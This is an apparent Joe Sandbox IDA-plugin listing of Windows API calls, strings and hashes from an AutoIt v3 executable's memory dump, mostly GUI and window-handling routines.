                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3521893082-0
                                                                                                                                        APIs
                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 007BA42A
                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007BA4E9
                                                                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007BA527
                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007BA539
                                                                                                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 007BA57F
                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 007BA58B
                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 007BA5CF
                                                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007BA5DE
                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 007BA5EE
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 007BA5F2
                                                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007BA602
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007BA60B
                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 007BA614
                                                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007BA642
                                                                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 007BA659
                                                                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 007BA694
                                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 007BA6A8
                                                                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 007BA6B9
                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 007BA6E9
                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 007BA6F4
                                                                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007BA6FF
                                                                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007BA709
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                        • API String ID: 2910397461-517079104
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 007AE45E
                                                                                                                                        • GetDriveTypeW.KERNEL32(?,007FDC88,?,\\.\,007FDBF0), ref: 007AE54B
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,007FDC88,?,\\.\,007FDBF0), ref: 007AE6B1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$DriveType
                                                                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                        • API String ID: 2907320926-4222207086
                                                                                                                                        • Opcode ID: 5b25c0b85c8b0edbad79cf125890940af282d25d6a557d7f94837fdcdf2056e0
                                                                                                                                        • Instruction ID: 138507c7dafcfe22a4e4f0974f2bb6babaeafef351308e5b5973684fa5edc9b6
                                                                                                                                        • Opcode Fuzzy Hash: 5b25c0b85c8b0edbad79cf125890940af282d25d6a557d7f94837fdcdf2056e0
                                                                                                                                        • Instruction Fuzzy Hash: 4451D130208301EB8610DF18CC9586AB7A5FFE6715B118F19F456EB391EB6CDE85DB82
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcsnicmp
                                                                                                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                        • API String ID: 1038674560-86951937
                                                                                                                                        • Opcode ID: 9f53ae1db48533f1483e11d8c83056f0b1d9c258dc47164fb7a3856e897a529d
                                                                                                                                        • Instruction ID: 1ef4309514bdf9c749635ba1ab3d5abb3f89e79d353e7f8dc61d636233aa7f88
                                                                                                                                        • Opcode Fuzzy Hash: 9f53ae1db48533f1483e11d8c83056f0b1d9c258dc47164fb7a3856e897a529d
                                                                                                                                        • Instruction Fuzzy Hash: 606119B1740356BBDB32BA648C46FBA336DAF15740F044025FD9AA6283EB5CDE05C7A1
                                                                                                                                        APIs
                                                                                                                                        • DestroyWindow.USER32 ref: 00764956
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00764998
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 007649A3
                                                                                                                                        • DestroyCursor.USER32(00000000), ref: 007649AE
                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 007649B9
                                                                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 007DE179
                                                                                                                                        • 6F540200.COMCTL32(?,000000FF,?), ref: 007DE1B2
                                                                                                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 007DE5E0
                                                                                                                                          • Part of subcall function 007649CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00764954,00000000), ref: 00764A23
                                                                                                                                        • SendMessageW.USER32 ref: 007DE627
                                                                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 007DE63E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DestroyMessageSendWindow$DeleteObject$CursorF540200InvalidateMoveRect
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 22932394-4108050209
                                                                                                                                        • Opcode ID: 57051668ef66dcbae10519952e39ac53d850b8562c82d30f1c8e9451f501fbae
                                                                                                                                        • Instruction ID: 1541bc6ce861c8254f5cd147d8d01785610000cfb66f35c7a8df5e3ee2bc6a53
                                                                                                                                        • Opcode Fuzzy Hash: 57051668ef66dcbae10519952e39ac53d850b8562c82d30f1c8e9451f501fbae
                                                                                                                                        • Instruction Fuzzy Hash: 83128D30200641DFDB26EF14C888BAABBB5BF09304F54456AF99ADF252C739EC55CB91
                                                                                                                                        APIs
                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 007CC598
                                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 007CC64E
                                                                                                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 007CC669
                                                                                                                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 007CC925
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Window
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 2326795674-4108050209
                                                                                                                                        • Opcode ID: f09889987d463fbb052c9bf813f8f364286f1e70a97058a4d3f4604486223a44
                                                                                                                                        • Instruction ID: 73ae82ae593929181fc117b39f303ea07b45af26e3e9e696050a75cbe62b98ad
                                                                                                                                        • Opcode Fuzzy Hash: f09889987d463fbb052c9bf813f8f364286f1e70a97058a4d3f4604486223a44
                                                                                                                                        • Instruction Fuzzy Hash: DAF1EF71205341AFE7228F24C889FAABBE4FF49354F18862DF59DD62A1C778D850CB52
                                                                                                                                        APIs
                                                                                                                                        • CharUpperBuffW.USER32(?,?,007FDBF0), ref: 007C6245
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharUpper
                                                                                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                        • API String ID: 3964851224-45149045
                                                                                                                                        • Opcode ID: 5ec4d4fd187f4a11b7f7e7b3e547c2860829dc72ee56a4a0440becf5704062da
                                                                                                                                        • Instruction ID: e7ce039841b8c71d98d74fe476cebf4aae7f67e3d5973e89fd5327dd4eb17f28
                                                                                                                                        • Opcode Fuzzy Hash: 5ec4d4fd187f4a11b7f7e7b3e547c2860829dc72ee56a4a0440becf5704062da
                                                                                                                                        • Instruction Fuzzy Hash: 7FC18174204201CBCF04EF54D595FAE7796BF94390F14886CF8869B3A6CB28DD4ACB82
                                                                                                                                        APIs
                                                                                                                                        • GetSysColor.USER32(00000012), ref: 007CD3BE
                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 007CD3C2
                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 007CD3D8
                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 007CD3E3
                                                                                                                                        • CreateSolidBrush.GDI32(?), ref: 007CD3E8
                                                                                                                                        • GetSysColor.USER32(00000011), ref: 007CD400
                                                                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 007CD40E
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 007CD41F
                                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 007CD428
                                                                                                                                        • SelectObject.GDI32(?,?), ref: 007CD435
                                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 007CD454
                                                                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007CD46B
                                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 007CD480
                                                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007CD4A8
                                                                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007CD4CF
                                                                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 007CD4ED
                                                                                                                                        • DrawFocusRect.USER32(?,?), ref: 007CD4F8
                                                                                                                                        • GetSysColor.USER32(00000011), ref: 007CD506
                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 007CD50E
                                                                                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 007CD522
                                                                                                                                        • SelectObject.GDI32(?,007CD0B5), ref: 007CD539
                                                                                                                                        • DeleteObject.GDI32(?), ref: 007CD544
                                                                                                                                        • SelectObject.GDI32(?,?), ref: 007CD54A
                                                                                                                                        • DeleteObject.GDI32(?), ref: 007CD54F
                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 007CD555
                                                                                                                                        • SetBkColor.GDI32(?,?), ref: 007CD55F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1996641542-0
                                                                                                                                        • Opcode ID: 88e9d33d52ca6d0dee394a0817eeb664f330e34801ffec28f9bc754aa156b463
                                                                                                                                        • Instruction ID: 4c7f177d76cb0d79b0cb18ce5b7f5966a6b9bb08aa1108f6630b4873e9f92e03
                                                                                                                                        • Opcode Fuzzy Hash: 88e9d33d52ca6d0dee394a0817eeb664f330e34801ffec28f9bc754aa156b463
                                                                                                                                        • Instruction Fuzzy Hash: E2512D71901248FFDF209FA4DC88EAE7B79FB08320F218519F915AB2A1D7799E40CB54
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007CB5C0
                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007CB5D1
                                                                                                                                        • CharNextW.USER32(0000014E), ref: 007CB600
                                                                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007CB641
                                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007CB657
                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007CB668
                                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 007CB685
                                                                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 007CB6D7
                                                                                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 007CB6ED
                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 007CB71E
                                                                                                                                        • _memset.LIBCMT ref: 007CB743
                                                                                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 007CB78C
                                                                                                                                        • _memset.LIBCMT ref: 007CB7EB
                                                                                                                                        • SendMessageW.USER32 ref: 007CB815
                                                                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 007CB86D
                                                                                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 007CB91A
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 007CB93C
                                                                                                                                        • GetMenuItemInfoW.USER32(?), ref: 007CB986
                                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007CB9B3
                                                                                                                                        • DrawMenuBar.USER32(?), ref: 007CB9C2
                                                                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 007CB9EA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 1073566785-4108050209
                                                                                                                                        • Opcode ID: 40b7b9f1afc795c81534468735c4f0b82fdbde393fe0efdd516cb31f484082b1
                                                                                                                                        • Instruction ID: 14d3483412c5dfba799036ad57f18fedb82c0f62e2f585b2d9fd46c7c2cb9ba9
                                                                                                                                        • Opcode Fuzzy Hash: 40b7b9f1afc795c81534468735c4f0b82fdbde393fe0efdd516cb31f484082b1
                                                                                                                                        • Instruction Fuzzy Hash: 44E14D71900258AADF219FA0DC8AFEE7BB8FF05750F10815EF919AB190D7788A41CF60
                                                                                                                                        APIs
                                                                                                                                        • GetCursorPos.USER32(?), ref: 007C7587
                                                                                                                                        • GetDesktopWindow.USER32 ref: 007C759C
                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 007C75A3
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 007C7605
                                                                                                                                        • DestroyWindow.USER32(?), ref: 007C7631
                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007C765A
                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007C7678
                                                                                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007C769E
                                                                                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 007C76B3
                                                                                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007C76C6
                                                                                                                                        • IsWindowVisible.USER32(?), ref: 007C76E6
                                                                                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 007C7701
                                                                                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 007C7715
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 007C772D
                                                                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 007C7753
                                                                                                                                        • GetMonitorInfoW.USER32 ref: 007C776D
                                                                                                                                        • CopyRect.USER32(?,?), ref: 007C7784
                                                                                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 007C77EF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                        • String ID: ($0$tooltips_class32
                                                                                                                                        • API String ID: 698492251-4156429822
                                                                                                                                        • Opcode ID: 3e07f894188e2276c4effd0b5d9125c8d6a3f001e93a0f393c27cdf50b885e89
                                                                                                                                        • Instruction ID: 8229acd0371debbaf2dae7a298e8f6209a9fc5bb58b36d444125c13d22ec5a3f
                                                                                                                                        • Opcode Fuzzy Hash: 3e07f894188e2276c4effd0b5d9125c8d6a3f001e93a0f393c27cdf50b885e89
                                                                                                                                        • Instruction Fuzzy Hash: DEB16B71608340AFDB18DF64C988F6ABBE5BF88350F00891DF5999B291DB78EC05CB95
                                                                                                                                        APIs
                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0077A839
                                                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 0077A841
                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0077A86C
                                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 0077A874
                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 0077A899
                                                                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0077A8B6
                                                                                                                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0077A8C6
                                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0077A8F9
                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0077A90D
                                                                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 0077A92B
                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 0077A947
                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0077A952
                                                                                                                                          • Part of subcall function 0077B736: GetCursorPos.USER32(000000FF), ref: 0077B749
                                                                                                                                          • Part of subcall function 0077B736: ScreenToClient.USER32(00000000,000000FF), ref: 0077B766
                                                                                                                                          • Part of subcall function 0077B736: GetAsyncKeyState.USER32(00000001), ref: 0077B78B
                                                                                                                                          • Part of subcall function 0077B736: GetAsyncKeyState.USER32(00000002), ref: 0077B799
                                                                                                                                        • SetTimer.USER32(00000000,00000000,00000028,0077ACEE), ref: 0077A979
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                        • String ID: AutoIt v3 GUI
                                                                                                                                        • API String ID: 1458621304-248962490
                                                                                                                                        • Opcode ID: 62c2317186a59bb89e8c1a99fe975b627962c3271bb18c7d594258d396389a3e
                                                                                                                                        • Instruction ID: 042bb2f103af75be0ca1456c53dcd0613761dc85fe64a5bcce64ce3fce179c3e
                                                                                                                                        • Opcode Fuzzy Hash: 62c2317186a59bb89e8c1a99fe975b627962c3271bb18c7d594258d396389a3e
                                                                                                                                        • Instruction Fuzzy Hash: 39B18071A0020AEFDF14DFA8CC89BAD7BB4FB48354F108129FA159B290D778E851CB55
                                                                                                                                        APIs
                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 007C6A52
                                                                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007C6B12
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                        • API String ID: 3974292440-719923060
                                                                                                                                        • Opcode ID: 0d4aa86dd39bf60b52852e0f7b994d9cca4609fa1d276ecce2704890c1e0458e
                                                                                                                                        • Instruction ID: d8ce0caaac0151f16b3fdee37486cbf939143138cfbff2adba37dc29a00f47f7
                                                                                                                                        • Opcode Fuzzy Hash: 0d4aa86dd39bf60b52852e0f7b994d9cca4609fa1d276ecce2704890c1e0458e
                                                                                                                                        • Instruction Fuzzy Hash: 37A1AE70204201DBCB14EF24C995F6AB7A5FF84354F14896DF8A69B392DB38EC09CB52
                                                                                                                                        APIs
                                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0079DD87
                                                                                                                                        • __swprintf.LIBCMT ref: 0079DE28
                                                                                                                                        • _wcscmp.LIBCMT ref: 0079DE3B
                                                                                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0079DE90
                                                                                                                                        • _wcscmp.LIBCMT ref: 0079DECC
                                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 0079DF03
                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 0079DF55
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0079DF8B
                                                                                                                                        • GetParent.USER32(?), ref: 0079DFA9
                                                                                                                                        • ScreenToClient.USER32(00000000), ref: 0079DFB0
                                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0079E02A
                                                                                                                                        • _wcscmp.LIBCMT ref: 0079E03E
                                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0079E064
                                                                                                                                        • _wcscmp.LIBCMT ref: 0079E078
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
